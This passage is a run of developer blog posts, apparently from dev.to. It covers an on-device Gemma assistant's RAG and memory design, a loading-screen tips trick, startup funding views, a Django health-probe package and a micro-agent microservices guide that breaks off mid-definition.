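def dispatch(model_output: str) -> Optional[str]:
    """Return the tool result, or None when the output is not a valid tool call."""
    try:
        call = json.loads(model_output)
    except json.JSONDecodeError:
        return None  # plain chat reply, not a tool call
    if not isinstance(call, dict):
        return None
    tool = call.get("tool")
    params = call.get("params", {})
    if not isinstance(tool, str) or tool not in TOOLS or not isinstance(params, dict):
        return None
    try:
        return TOOLS[tool](**params)
    except TypeError:
        return None  # the model emitted wrong or missing parameters
```

Returning `None` for anything that does not parse cleanly lets the caller fall back to treating the output as an ordinary chat reply, which matters with a small model that will sometimes emit malformed JSON.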

## Things that broke

### RAG dies on generic queries

Vanilla RAG works fine for specific questions. Someone uploads a PDF about PocketClaw, asks "who built PocketClaw", retrieval picks up a chunk that contains my name, Gemma summarises, done.

It falls over on the queries people actually type. I caught this Friday afternoon. I'd shipped what I thought was a working build. I uploaded `llmaiedge.pdf` (a PDF about edge LLMs I had lying around), typed "summarise the document", hit send. Claw answered with "Summarize the document." That's it. I tried twice more with different phrasing. Same answer. Eventually I typed "summarise llmaiedge.pdf" and got a real response. The filename was doing the work, not my retrieval.

The problem is that "summarise this doc" has no semantic overlap with the actual document text. The doc doesn't contain the words "summarise" or "this doc." Cosine similarity returns nothing useful, the prompt goes to Gemma with no real context, and Gemma fills in with whatever its training data feels like saying about generic documents.

The fix runs two heuristics:

```
final isGenericIntent = hits.length <= 1 && (
    lower.contains('summari') ||
    lower.contains('tldr') ||
    lower.contains('explain') ||
    lower.contains('describe') ||
    lower.contains('the document') ||
    lower.contains('the pdf')
    // ... a few more
);

if (isGenericIntent) {
    // Fall back to searching with each indexed doc's filename as the query.
    hits = await RagService.instance.getDocStarts(
        conversationId: _conversation.id,
    );
}
```

`getDocStarts` runs `searchSimilar` once per indexed doc, using the filename itself as the query. Filenames are rare distinctive tokens. Every chunk in the vector store has the filename in metadata. So this pulls back real chunks regardless of how the user phrased their question. Two lines of conditional logic, and the difference between a broken demo and a working one.
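The whole fallback can be restated in a few lines of Python. This is a sketch of the idea rather than a port of the Dart code: `search` is a hypothetical callable standing in for `searchSimilar`, and the marker list only covers the terms shown above.

```python
GENERIC_MARKERS = ("summari", "tldr", "explain", "describe", "the document", "the pdf")

def is_generic_intent(query: str, hit_count: int) -> bool:
    """True when retrieval came back nearly empty and the query targets the whole document."""
    lower = query.lower()
    return hit_count <= 1 and any(marker in lower for marker in GENERIC_MARKERS)

def retrieve(query, search, filenames):
    """`search` is a hypothetical callable: search(text) -> list of chunks."""
    hits = search(query)
    if is_generic_intent(query, len(hits)):
        # Fall back to one search per indexed document, keyed on its filename.
        hits = [chunk for name in filenames for chunk in search(name)]
    return hits
```

Note that both conditions have to hold: a query containing "explain" that already retrieved several chunks keeps its normal results.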

### Small models drop facts buried mid-prompt

I wanted Claw to remember the user's name. Onboarding asks for it, prefs stores it, the system prompt includes it. User asks "what's my name?" Claw says "I do not know your name."

The first version of my system prompt looked like this:

```
You are Claw. You run locally and offline. You are talking to Manoj Shetty.
Match your answer length to the question. Prefer plain answers over preambles.
Never restate the question. If unsure, say so briefly.
```

The third sentence has the name. Gemma 4 E2B dropped it completely. I burned about an hour staring at this before I figured out what was happening. My theory is that "never restate the question" was acting as a dominant instruction that generalized to "don't reference user context at all." Small models do that. Cloud LLMs don't.

The fix was to move the fact to the top of the prompt:

```
final namePart = (userName != null && userName.trim().isNotEmpty)
    ? "The name of the user is ${userName.trim()}.\n\n"
    : '';
final systemPreamble = '${namePart}You are Claw, ...';
```

Same information. First line of the prompt, on its own, in a flat declarative sentence. Worked first try.

Lesson I've now learned twice. With small models, what you want the model to know goes at the front, in simple sentences, without competing instructions next to it. Cloud LLMs respect the whole prompt. 2B models don't.

### Audio in flutter_gemma is framed for Gemma 3n, not Gemma 4

I wanted to skip the speech-to-text plugin entirely. Just feed audio bytes directly to Gemma 4 E2B's audio modality. The model card says E2B supports audio. Cleaner architecture, one fewer dependency.

I went to dig into `flutter_gemma` v0.15.1 source. Eight different files in the plugin frame audio as a Gemma 3n E4B feature, including this in the interface:

```
/// [supportAudio] — whether the model supports audio (Gemma 3n E4B only).
bool supportAudio = false,
```

The example app makes the real constraint clearer: `.litertlm` files that bundle `TF_LITE_AUDIO_ENCODER` work with `supportAudio: true`, `.task` files don't. So the actual limit isn't the Gemma version; it's whether your specific model file contains the audio encoder. I haven't found a Gemma 4 E2B `.litertlm` build that bundles the audio encoder, and the plugin's docs treat audio as 3n-territory.

So PocketClaw uses Android system STT via the `speech_to_text` package, which is a wrapper around `RecognizerIntent`. Side benefit: I get live transcription as the user speaks, which is genuinely a better UX than the "hold, release, wait three seconds, see both the transcription and the response" pattern you'd get from on-model audio. When a Gemma 4 E2B `.litertlm` build with audio encoder ships, the voice path collapses into a single multimodal call. Not blocking on v1.

## Long chats and memory

Gemma 4 has a 128K context window. That's plenty in theory. In practice, every token costs latency and RAM, so I'd rather not feed the whole history every turn.

PocketClaw keeps the most recent 24 messages in full text. Anything older runs through a compaction pass:

- Extract facts the user has stated explicitly ("I am X", "My name is Y", "Remember Z").
- Capture unresolved goals (keywords like "fix", "todo", "issue").
- Compile the whole thing into a single lightweight summary paragraph that gets prepended to the prompt as memory.
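A rough Python sketch of that compaction pass is below. The 24-message window and the trigger phrases come from the list above; the message shape (`role` / `text` dicts), the regexes, and the summary wording are assumptions made for the example.

```python
import re

RECENT_LIMIT = 24  # messages kept verbatim
FACT_PATTERN = re.compile(r"\b(i am|my name is|remember)\b", re.IGNORECASE)
GOAL_PATTERN = re.compile(r"\b(fix|todo|issue)\b", re.IGNORECASE)

def compact(messages: list) -> tuple:
    """Split history into (memory summary, recent messages)."""
    older, recent = messages[:-RECENT_LIMIT], messages[-RECENT_LIMIT:]
    facts, goals = [], []
    for msg in older:
        if msg["role"] != "user":
            continue
        text = msg["text"]
        if FACT_PATTERN.search(text):
            facts.append(text)       # explicit user-stated fact
        elif GOAL_PATTERN.search(text):
            goals.append(text)       # unresolved goal keyword
    parts = []
    if facts:
        parts.append("Known facts: " + " | ".join(facts))
    if goals:
        parts.append("Open goals: " + " | ".join(goals))
    return " ".join(parts), recent
```

With 24 or fewer messages, nothing is compacted and the summary is an empty string, so the prompt is unchanged for short chats.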

The more aggressive part: when an image message slides past the 24-message boundary, the raw image bytes get deleted. What stays is the assistant's prior textual description of that image:

```
String _imageMemoryFromAssistant({
  required String? imageName,
  required String assistantText,
}) {
  final label = imageName ?? 'uploaded image';
  return 'Assistant previously described $label as: ${_shorten(assistantText, 1000)}';
}
```

Claw still "remembers" what it saw, but without the bytes weighing on the prompt. This matters more than it sounds like it should. A 1 MB photo as base64 is around 30K tokens. The textual description of the same image is around 100. So this is roughly a 300x compression of image memory, with surprisingly little loss for the kinds of follow-up questions users actually ask.

## Stack

Flutter 3.41 / Dart 3.11. Chat model is Gemma 4 E2B INT4 at 1.5 GB, loaded through `flutter_gemma` on top of MediaPipe LLM and LiteRT-LM. Embedder is Gecko 110M (110 MB) for RAG. Vector store is sqlite-vec with HNSW, on device. Speech-to-text is the system STT via `speech_to_text`. Eight device actions go through a Kotlin MethodChannel. Hive for state (separate boxes for conversations, documents, prefs). `syncfusion_flutter_pdf` for PDF extraction. The theme is custom neobrutalistic dark with hard borders, monospace type, and cyan/purple/mint accents. I wanted it to feel like a piece of hardware, not a Material 3 chat app.

## What didn't make v1

A **floating overlay bubble** (Android 13+ accessibility-style overlay) was in the original design. I cut it because the overlay permission UX has a long tail I didn't want to ship rough.

**Direct Gemma 4 audio input.** Waiting on a Gemma 4 E2B `.litertlm` build with the audio encoder. v2 when that's available.

**Per-message RAG toggle.** Rig

---
## How I Got Users to Willingly Wait 1 Minute for an API Call (Without Over-Engineering)

> Published: 2026-05-24 04:43:34+00:00
> Source: https://dev.to/cathylai/how-i-got-users-to-willingly-wait-1-minute-for-an-api-call-without-over-engineering-2coc
> wpnews: https://wpnews.pro/news/how-i-got-users-to-willingly-wait-1-minute-for-an-api-call-without-over

The article describes how the developer of an AI garden visualizer app addressed the problem of a one-minute API wait time by displaying illustrated garden tips during the delay. Instead of trying to hide or eliminate the wait through complex engineering, the developer used a simple `setInterval` function to rotate tips every 7 seconds, turning the waiting period into a learning experience. This shift in perspective transformed the app from a simple image generator into a helpful gardening companion, demonstrating that changing user experience can be more effective than technical optimization.

One of the most awkward parts of building my AI garden visualizer was not actually the AI itself — it was the waiting time.
The image generation API I used could take close to a minute to return a result. From a developer’s perspective, the obvious solutions might be
But none of these is ideal. Some of them require days of work and research, and I haven't even got any users for the app yet!
Most homeowners using this app are not garden experts. Many feel overwhelmed by messy backyards, overgrown plants, drainage issues, or simply not knowing where to begin. They do not necessarily want to study gardening for weeks. They want quick, practical guidance that helps them feel more confident immediately.
So instead of trying to “hide” the waiting time, I decided to use it.
During the AI processing phase, the app now displays simple illustrated garden tips every few seconds — almost like a lightweight PowerPoint presentation. Each screen is designed to be scannable within 7–10 seconds:
Then use `setInterval` to display them:

```
// use setInterval() to display a garden tip every 7 seconds
window.setInterval(() => {
  setTipVisible(false);
  // use setTimeout to fade in/out
  timeoutId = window.setTimeout(() => {
    setTipIndex((prevIndex) => getRandomTipIndex(prevIndex));
    setTipVisible(true);
  }, 500);
}, 7000);
```
The interesting thing is that users no longer feel like they are waiting. They are learning.
And I think this taught me an important lesson about software development: sometimes the best solution is not deeper engineering complexity, but changing perspective. Instead of asking, “How do I technically eliminate the delay?”, I started asking, “What would make this minute genuinely useful for the user?”
That shift completely changed the experience of the app.
Ironically, the long API call became an opportunity to strengthen the product’s identity. The app stopped feeling like a simple image generator and started feeling more like a helpful gardening companion.

---
## Easier Bets to Get Early Customer Validation and VC Attention

> Published: 2026-05-24 04:26:55+00:00
> Source: https://dev.to/anantdhavale1/easier-bets-to-get-early-customer-validation-and-vc-attention-12go
> wpnews: https://wpnews.pro/news/easier-bets-to-get-early-customer-validation-and-vc-attention

The article argues that achieving scale in Enterprise AI requires significant resources, making early customer validation difficult for most startups. It suggests that VCs prioritize user adoption, which is easier to obtain with focused ideas like personalized AI agents or domain-specific GPTs rather than large platforms. The author notes that VCs outside the US are particularly risk-averse and require proven revenue before investing.

There is not much scale to be achieved in the Enterprise AI space unless you have a big team, a solid funding pipeline and a large multi-capability platform. Most AI work on the B2B large-organization side is going to be building services, data products, APIs and integrating AI agents.
From my experience, what VCs look for is user adoption and customer validation. That typically takes a year or so, depending on how strong your network is or whether you have a dedicated sales and marketing org. Most startups do not have that kind of money or resources, so getting customer validation early is difficult.
Personalized AI agents, recruitment AI, domain-specific GPTs, smaller SaaS products and the like are better bets for getting both some early recurring revenue and the VC support that follows.
VCs outside of the US (especially San Francisco) are risk averse and need to see the money before they can potentially invest.
I am not trying to dissuade people from entering the enterprise space; rather, I have listed the things that I have observed from being in this space for the past few months or so.
Would love to know y'all's views.

---
## django-deploy-probes — deployment probe endpoints for Django

> Published: 2026-05-24 04:26:25+00:00
> Source: https://dev.to/emfpdlzj/django-deploy-probes-deployment-probe-endpoints-for-django-5akb
> wpnews: https://wpnews.pro/news/django-deploy-probes-deployment-probe-endpoints-for-django

The article introduces **django-deploy-probes**, a small Django package that provides standardized health check endpoints (`/healthz`, `/readyz`, `/startupz`, `/version`) for production deployment workflows like Kubernetes probes and Docker health checks. It separates lightweight liveness checks from dependency checks (e.g., database, Redis) by design, placing the latter in `/readyz` or `/startupz` to avoid mixing concerns. The package aims to replace the inconsistent, repeatedly rewritten health check logic found across Django projects with a reusable, simple solution.

When deploying Django applications, I kept running into the same problem: health check endpoints were implemented differently in every project, and liveness checks often got mixed together with dependency checks.

I built `django-deploy-probes` to make that cleaner.

It is a small Django package that adds these endpoints:

- `/healthz`
- `/readyz`
- `/startupz`
- `/version`

The package is meant for production deployment workflows such as Docker health checks, Kubernetes liveness/readiness/startup probes, blue-green deployments, rolling deployments, and CI/CD deployment validation.

One design choice I cared about was keeping `/healthz` lightweight. Database, Redis, Celery, or other dependency checks do not belong in a liveness endpoint by default, so those checks are meant to live in `/readyz` or `/startupz` and be enabled explicitly through settings.
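The liveness/readiness split can be illustrated without any framework. The sketch below is not the package's code or API; the function names and the `checks` mapping are hypothetical and only show why the two endpoints behave differently.

```python
from typing import Callable, Dict, Tuple

def liveness() -> Tuple[int, dict]:
    """Process is up and can answer; deliberately touches no dependency."""
    return 200, {"status": "ok"}

def readiness(checks: Dict[str, Callable[[], bool]]) -> Tuple[int, dict]:
    """Run each explicitly enabled dependency check; any failure means not ready."""
    results = {}
    for name, check in checks.items():
        try:
            results[name] = bool(check())
        except Exception:
            # A check that raises (e.g. connection refused) counts as a failure.
            results[name] = False
    ok = all(results.values())
    status = "ok" if ok else "unavailable"
    return (200 if ok else 503), {"status": status, "checks": results}
```

If the database is down, `readiness` returns 503 so traffic is routed away, while `liveness` keeps returning 200 so the orchestrator does not restart a process that is otherwise healthy.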

The goal was not to build a full monitoring system, but to provide a small, reusable package for a piece of deployment logic that tends to get rewritten over and over in Django projects.

Installation is simple:

```
pip install django-deploy-probes
```

Then include the URLs in your Django project:

``` python
from django.urls import include, path

urlpatterns = [
    path("probes/", include("django_deploy_probes.urls")),
]
```

That gives you endpoints like:

- /probes/healthz
- /probes/readyz
- /probes/startupz
- /probes/version

The first public release is 0.1.0, and it is available on both GitHub and PyPI.

GitHub: [https://github.com/emfpdlzj/django-deploy-probes](https://github.com/emfpdlzj/django-deploy-probes)

PyPI: [https://pypi.org/project/django-deploy-probes/](https://pypi.org/project/django-deploy-probes/)

I’d appreciate feedback from people running Django in production, especially around the endpoint split, default behavior, and whether there are deployment cases I should support better.

---
## AI Won’t Replace Developers. Weak Thinking Will.

> Published: 2026-05-24 04:24:49+00:00
> Source: https://dev.to/jaideepparashar/ai-wont-replace-developers-weak-thinking-will-fee
> wpnews: https://wpnews.pro/news/ai-wont-replace-developers-weak-thinking-will

The article argues that AI will not replace software developers, but that weak thinking and a lack of deep understanding pose the real threat to their careers. It states that AI removes friction from coding tasks, making execution easier, but it cannot replace the human ability to think clearly and build mental models. Ultimately, the most successful developers will be those who use AI as a collaborative tool to amplify their structured thinking and experience, rather than those who become over-dependent on it for shallow code generation.

The conversation around AI is full of fear.
Every day, developers are asking the same questions:
“Will AI take my job?”
“Is coding becoming obsolete?”
“Should I even continue learning development?”
But after years of studying systems, business, human behavior, and Artificial Intelligence, I believe most people are asking the wrong question.
The real threat is not AI.
The real threat is weak thinking.
AI Changes Execution. Thinking Still Creates Value.
AI can now:
But there is something AI still depends on:
Human direction.
AI amplifies thinking.
It does not replace it.
A weak thinker with powerful AI tools will still produce weak outcomes.
A clear thinker with AI becomes exponentially more powerful.
That is the real shift happening right now.
The Developers Who Will Win
The future does not belong to developers who simply memorize syntax.
It belongs to developers who can:
The modern developer is no longer just a coder.
The modern developer is becoming:
Coding is evolving from manual production to intelligent direction.
AI Is Removing Friction
This is important to understand.
AI is not destroying development.
AI is removing friction from development.
Things that once took:
can now be done in minutes.
This creates a new reality:
Execution becomes easier.
Thinking becomes rarer.
And rare skills become valuable.
The Dangerous Illusion
Many developers are becoming overdependent on AI.
They copy.
Paste.
Generate.
Ship.
But they do not deeply understand:
This creates an illusion of competence.
AI can help you produce code.
But it cannot replace deep understanding.
And eventually, shallow knowledge collapses under complexity.
The New Competitive Advantage
In the AI era, your advantage is no longer:
Your advantage becomes:
The developers who succeed will not fight AI.
They will collaborate with it.
My Personal Observation
I have spent years studying:
One pattern keeps repeating:
Tools change.
Human leverage principles remain the same.
People who think clearly outperform people who simply work harder.
AI magnifies this difference dramatically.
Developers Must Build Mental Models
The future developer must go beyond tutorials.
You must build mental models.
Understand:
Because AI can generate information.
But wisdom still requires experience.
That is why I strongly believe:
“In a world of generated content, experience becomes the real currency.”
The Real Skill of the Future
The most valuable skill is not prompting.
It is structured thinking.
Prompt engineering itself is ultimately a reflection of thinking quality.
Better thinking creates:
AI exposes how clearly you think.
Final Thought
AI is not the end of developers.
It is the beginning of a new category of developers.
The ones who survive will not necessarily be the smartest coders.
They will be the clearest thinkers.
Because in the AI era:
Execution is automated.
Thinking is leveraged.
Adaptability becomes survival.
And the developers who learn how to think deeply while using AI effectively will become unstoppable.

---
## Building Micro Agents as Production-Grade Microservices

> Published: 2026-05-24 04:24:16+00:00
> Source: https://dev.to/murali8k/building-micro-agents-as-production-grade-microservices-f4j
> wpnews: https://wpnews.pro/news/building-micro-agents-as-production-grade-microservices

This article describes how to build production-grade AI agent systems using a microservices architecture, moving beyond single-process prototypes that fail at scale. It advocates for designing each "micro agent" as an independent service with its own API contract, memory scope, and SLA, using technologies like FastAPI, gRPC, Kafka, and Kubernetes. The guide provides concrete implementation patterns including stateless LLM inference, external memory stores, idempotent tool calls, async task queues, and a standardized project structure with health checks and observability.

Build production-grade AI agent systems using microservices. Covers FastAPI, gRPC, Kafka, Kubernetes, OpenTelemetry, and fault-tolerant orchestration patterns in Python.

### Table of Contents

- Introduction & Motivation
- Core Architecture Principles
- Agent Service Design
- The AgentRunner Loop
- Inter-Agent Communication
- Tool Registry Service
- Memory Architecture
- Context Window Management
- Orchestrator & Supervisor Pattern
- Security & Authorization
- Observability: Traces, Logs, Metrics
- Deployment on Kubernetes
- Scaling Strategies
- Fault Tolerance & Retry Strategies
- Testing Agent Microservices
- CI/CD Pipeline for Agent Services
- Cost Management & Token Budgeting
- Production Readiness Checklist
- Reference Architecture Diagram

### Introduction & Motivation

#### Why monolithic agent systems fail in production

A single-process agent that handles reasoning, tool calls, memory retrieval, and output generation works well in prototypes. In production it breaks in predictable ways:

- **Latency coupling:** one slow tool call blocks the entire inference loop
- **Unscalable compute:** you cannot scale the summarization workload independently from the search workload
- **Blast radius:** a single LLM API timeout or memory corruption takes the whole system down
- **Zero deployment granularity:** updating one tool integration requires redeploying everything
- **No isolation for billing:** impossible to attribute compute cost to individual agent functions

#### The microservice solution

Each autonomous capability becomes an independently deployable, independently scalable service with:

- Its own API surface (HTTP/gRPC)
- Its own health checks and readiness probes
- Its own memory scope (no shared in-process state)
- Its own tool bindings (resolved at runtime from a Tool Registry)
- Its own observability (distributed traces, metrics, structured logs)

#### What is a Micro Agent?

A **micro agent** is a bounded autonomous service that:

- Accepts a task (prompt + context + session ID) via an API call
- Runs a plan → act → observe loop using an LLM backend
- Invokes tools via a centralized Tool Registry
- Stores and retrieves conversation state from an external memory store
- Returns a typed result or emits an event to downstream consumers

Key insight: A micro agent is not a “smart function”; it is a service with its own API contract, memory scope, failure modes, and SLA. Design it accordingly.

### Core Architecture Principles

#### Single Responsibility

Each agent owns exactly one reasoning domain. Examples:

#### Stateless Reasoning, Stateful Memory

The LLM inference step **must be stateless**. Memory lives in external stores:

No conversation history should ever live in in-process RAM between requests.

#### Schema-First Tool Contracts

Every tool must have a JSON Schema definition published to a shared Tool Registry before any agent can invoke it. No ad-hoc function signatures. This enables:

- Runtime input validation before LLM output reaches backend services
- Auto-generated documentation
- Tool versioning with backwards compatibility checks
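As a small illustration of validating LLM-produced arguments before they reach a backend, here is a hand-rolled check against a tiny subset of JSON Schema. The schema, the tool, and the validator are hypothetical; a real registry would more likely use a full JSON Schema validator or Pydantic models.

```python
# Hypothetical registry entry: a tool described by a small JSON Schema subset.
SEARCH_TOOL_SCHEMA = {
    "type": "object",
    "required": ["query"],
    "properties": {
        "query": {"type": "string"},
        "limit": {"type": "integer"},
    },
}

_JSON_TYPES = {"string": str, "integer": int, "boolean": bool, "object": dict, "array": list}

def validate_args(schema: dict, args: dict) -> list:
    """Return a list of error strings; an empty list means the arguments are valid."""
    errors = []
    for field in schema.get("required", []):
        if field not in args:
            errors.append(f"missing required field: {field}")
    for field, value in args.items():
        spec = schema.get("properties", {}).get(field)
        if spec is None:
            # Stricter than JSON Schema's default, which allows extra properties.
            errors.append(f"unexpected field: {field}")
            continue
        expected = _JSON_TYPES[spec["type"]]
        # bool is a subclass of int in Python, so reject it explicitly for integers.
        if not isinstance(value, expected) or (expected is int and isinstance(value, bool)):
            errors.append(f"{field}: expected {spec['type']}")
    return errors
```

Rejecting unknown fields is a deliberate choice for this sketch: hallucinated parameters from the model are surfaced as errors instead of being silently ignored.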

#### Idempotent Actions

Any tool call that modifies external state (send email, write to DB, trigger webhook) must be idempotent. Strategies:

- Use **idempotency keys** at the HTTP layer (pass Idempotency-Key header)
- Use **message deduplication** at the queue level (Kafka exactly-once semantics)
- Design tool handlers to be safe to retry: check-then-act patterns
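The check-then-act idea can be sketched with a key derived from the call itself. Everything here is illustrative: the class name, the key derivation, and the in-memory dict (which a production system would replace with a shared store with a TTL, and which is not safe under concurrent writers).

```python
import hashlib
import json

class IdempotentExecutor:
    """Runs a side-effecting handler at most once per idempotency key."""

    def __init__(self):
        # A dict keeps the sketch runnable; it is not shared across processes.
        self._results = {}

    @staticmethod
    def key_for(task_id: str, tool: str, args: dict) -> str:
        # Same task + tool + arguments always yields the same key.
        payload = json.dumps({"task": task_id, "tool": tool, "args": args}, sort_keys=True)
        return hashlib.sha256(payload.encode("utf-8")).hexdigest()

    def execute(self, key: str, handler, *args, **kwargs):
        if key in self._results:           # check ...
            return self._results[key]
        result = handler(*args, **kwargs)  # ... then act
        self._results[key] = result
        return result
```

A retried tool call with the same key returns the stored result instead of sending the email or writing the row a second time.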

#### Async by Default

Long-running agent tasks (multi-step research, code generation + execution) must use async task queues — not synchronous HTTP with long timeouts.

```
Client ──► POST /tasks      ──► Kafka/BullMQ ──► AgentWorker
Client ──► GET /tasks/{id}  ──► Redis (status polling)
       ◄── WebSocket/SSE push (optional)
```
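The submit-then-poll flow can be tried out with an in-memory stand-in. In this sketch an `asyncio.Queue` plays the role of Kafka/BullMQ and a dict plays the role of Redis; the class and method names are hypothetical.

```python
import asyncio
import uuid

class TaskBroker:
    """In-memory stand-in for the queue and the status store."""

    def __init__(self):
        self.queue = asyncio.Queue()
        self.status = {}

    async def submit(self, prompt: str) -> str:
        """What POST /tasks would do: enqueue and return immediately."""
        task_id = str(uuid.uuid4())
        self.status[task_id] = {"status": "pending", "output": None}
        await self.queue.put((task_id, prompt))
        return task_id

    def poll(self, task_id: str) -> dict:
        """What GET /tasks/{id} would do: read the current status."""
        return self.status[task_id]

    async def worker(self, handler):
        """Worker loop: pull one task at a time and record the outcome."""
        while True:
            task_id, prompt = await self.queue.get()
            self.status[task_id]["status"] = "running"
            try:
                output = await handler(prompt)
                self.status[task_id] = {"status": "completed", "output": output}
            except Exception as exc:
                self.status[task_id] = {"status": "failed", "output": str(exc)}
            finally:
                self.queue.task_done()
```

The caller gets a `task_id` back before any work has happened, which is the property that lets the HTTP request return quickly regardless of how long the agent runs.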

#### Explicit Context Boundaries

Each agent invocation carries a **bounded context packet** — never grow unbounded message histories. A ContextManager service compresses/summarizes history before injection.
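One way to picture a bounded context packet is a function that keeps the newest messages that fit a token budget and folds everything older into a single summary message. The names, the message shape, and the four-characters-per-token estimate are assumptions for this sketch, not the ContextManager's actual interface.

```python
def estimate_tokens(text: str) -> int:
    # Rough heuristic (about 4 characters per token); use a real tokenizer in practice.
    return max(1, len(text) // 4)

def build_context_packet(messages: list, budget: int, summarize=None) -> list:
    """Keep the newest messages that fit in `budget`; fold the rest into one summary."""
    kept, used = [], 0
    for msg in reversed(messages):          # walk from newest to oldest
        cost = estimate_tokens(msg["content"])
        if used + cost > budget:
            break
        kept.append(msg)
        used += cost
    kept.reverse()                          # restore chronological order
    dropped = messages[: len(messages) - len(kept)]
    if dropped and summarize is not None:
        # The summary itself is not counted against the budget in this sketch.
        kept.insert(0, {"role": "system", "content": summarize(dropped)})
    return kept
```

The `summarize` callable is where an LLM-backed compression step would plug in; passing `None` simply truncates.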

### Agent Service Design

#### Project Layout

Each agent is a containerized FastAPI or gRPC service with this canonical structure:

```
agent-search/
├── agent/
│   ├── core.py        # AgentRunner: plan → act → observe loop
│   ├── prompts.py     # System prompt + few-shot templates
│   ├── memory.py      # ContextManager: load/compress/save
│   ├── tools.py       # Tool bindings (calls Tool Registry)
│   └── schemas.py     # Pydantic models for all I/O
├── api/
│   ├── routes.py      # POST /run, GET /status/{task_id}
│   ├── middleware.py  # Auth, rate limiting, request tracing
│   └── deps.py        # Dependency injection: DB, Redis, LLM client
├── tests/
│   ├── unit/
│   ├── integration/
│   └── fixtures/
├── Dockerfile
├── pyproject.toml
└── k8s/
    ├── deployment.yaml
    ├── service.yaml
    ├── hpa.yaml
    └── configmap.yaml
```

#### API Contract

Every agent exposes these HTTP endpoints at minimum:

```
POST /run              Submit a task (sync, short tasks only)
POST /tasks            Submit a task (async, returns task_id)
GET  /tasks/{task_id}  Poll task status and result
GET  /health           Liveness probe
GET  /ready            Readiness probe (checks LLM + memory store)
GET  /metrics          Prometheus metrics endpoint
```

``` python
# agent/schemas.py
from pydantic import BaseModel, Field
from typing import Optional, Dict, Any
from enum import Enum

class TaskStatus(str, Enum):
    PENDING = "pending"
    RUNNING = "running"
    COMPLETED = "completed"
    FAILED = "failed"
    CANCELLED = "cancelled"

class AgentTask(BaseModel):
    id: str
    session_id: str
    prompt: str
    metadata: Dict[str, Any] = Field(default_factory=dict)
    max_steps: int = Field(default=10, ge=1, le=25)
    token_budget: int = Field(default=8192, ge=512, le=32768)

class AgentResult(BaseModel):
    task_id: str
    status: TaskStatus
    output: Optional[str] = None
    steps_used: int = 0
    tokens_used: int = 0
    tool_calls: int = 0
    error: Optional[str] = None
    duration_ms: int = 0
```

### The AgentRunner Loop

#### Full Implementation

``` python
# agent/core.py
import asyncio
import time
from opentelemetry import trace
from tenacity import retry, stop_after_attempt, wait_exponential_jitter

tracer = trace.get_tracer(__name__)
MAX_STEPS = 15

class AgentRunner:
    def __init__(self, agent_id: str, config: AgentConfig):
        self.agent_id = agent_id
        self.llm = LLMClient(model=config.model, timeout=30)
        self.memory = ContextManager(agent_id, max_tokens=config.context_limit)
        self.tools = ToolRegistryClient(config.tool_registry_url)
        self.metrics = AgentMetrics(agent_id)

    async def run(self, task: AgentTask) -> AgentResult:
        start = time.monotonic()

        with tracer.start_as_current_span("agent.run") as span:
            span.set_attribute("agent.id", self.agent_id)
            span.set_attribute("agent.task_id", task.id)
            span.set_attribute("agent.session", task.session_id)

            try:
                result = await self._run_loop(task, span)
            except TokenBudgetExceeded as e:
                result = AgentResult(
                    task_id=task.id,
                    status=TaskStatus.COMPLETED,
                    output=e.partial_output,
                    error="token_budget_exceeded"
                )
            except Exception as e:
                span.record_exception(e)
                result = AgentResult(
                    task_id=task.id,
                    status=TaskStatus.FAILED,
                    error=str(e)
                )
            finally:
                result.duration_ms = int((time.monotonic() - start) * 1000)
                self.metrics.record(result)

            return result

    async def _run_loop(self, task: AgentTask, span) -> AgentResult:
        # Load available tools from registry
        tool_schemas = await self.tools.fetch(agent_id=self.agent_id)

        # Load and compress conversation history
        context = await self.memory.load(task.session_id)
        messages = build_messages(context, task.prompt)

        total_tokens = 0
        tool_call_count = 0

        for step in range(task.max_steps):
            span.set_attribute("agent.current_step", step)

            with tracer.start_as_current_span("agent.llm_call") as llm_span:
                response = await self._complete_with_retry(messages, tool_schemas)
                llm_span.set_attribute("llm.prompt_tokens", response.usage.prompt_tokens)
                llm_span.set_attribute("llm.completion_tokens", response.usage.completion_tokens)

            total_tokens += response.usage.total_tokens

            if total_tokens > task.token_budget:
                raise TokenBudgetExceeded(
                    partial_output=response.content,
                    tokens_used=total_tokens
                )

            if response.finish_reason == "stop":
                await self.memory.save(task.session_id, messages + [response.message])
                return AgentResult(
                    task_id=task.id,
                    status=TaskStatus.COMPLETED,
                    output=response.content,
                    steps_used=step + 1,
                    tokens_used=total_tokens,
                    tool_calls=tool_call_count
                )

            if response.tool_calls:
                tool_call_count += len(response.tool_calls)
                results = await self._execute_tools(response.tool_calls)
                messages.append(response.message)
                messages.extend(tool_result_messages(results))

        # Hit max steps: return the last model output, flagged via `error`
        return AgentResult(
            task_id=task.id,
            status=TaskStatus.COMPLETED,
            output=response.content,
            steps_used=task.max_steps,
            tokens_used=total_tokens,
            tool_calls=tool_call_count,
            error="max_steps_reached"
        )

    @retry(stop=stop_after_attempt(3), wait=wait_exponential_jitter(max=15))
    async def _complete_with_retry(self, messages, tools):
        return await self.llm.complete(messages=messages, tools=tools)

    async def _execute_tools(self, tool_calls):
        tasks = [self.tools.invoke(tc) for tc in tool_calls]
        return await asyncio.gather(*tasks, return_exceptions=True)
```
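
Because `_execute_tools` passes `return_exceptions=True` to `asyncio.gather`, a failed tool comes back as an exception object in the results list instead of aborting the whole step. The article does not show `tool_result_messages`, so the following is only a minimal sketch of what such a helper might look like. The `ToolCall` dataclass, the two-argument signature, and the `{"role": "tool", ...}` message shape are all assumptions made for illustration.

```python
import asyncio
from dataclasses import dataclass


@dataclass
class ToolCall:
    # Hypothetical stand-in for the tool-call objects an LLM client returns.
    id: str
    name: str


def tool_result_messages(tool_calls, results):
    """Pair each tool call with its result; failures become error messages."""
    messages = []
    for call, result in zip(tool_calls, results):
        if isinstance(result, BaseException):
            content = f"error: {type(result).__name__}: {result}"
        else:
            content = str(result)
        messages.append({"role": "tool", "tool_call_id": call.id, "content": content})
    return messages


async def _demo():
    async def ok():
        return "42"

    async def boom():
        raise ValueError("bad input")

    calls = [ToolCall("c1", "calc"), ToolCall("c2", "search")]
    # gather preserves input order, so results line up with calls.
    results = await asyncio.gather(ok(), boom(), return_exceptions=True)
    return tool_result_messages(calls, results)


demo_messages = asyncio.run(_demo())
```

Feeding the error text back to the model as a tool message lets it decide whether to retry or answer without that tool, rather than failing the whole task on one bad call.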

### Inter-Agent Communication

#### Pattern Selection Matrix

#### gRPC Service Definition

For synchronous sub-agent calls, gRPC provides strong typing, bidirectional streaming, and efficient binary serialization.

``` protobuf
// proto/agent_service.proto
syntax = "proto3";
package agents.v1;

service AgentService {
  rpc RunTask (TaskRequest) returns (TaskResponse);
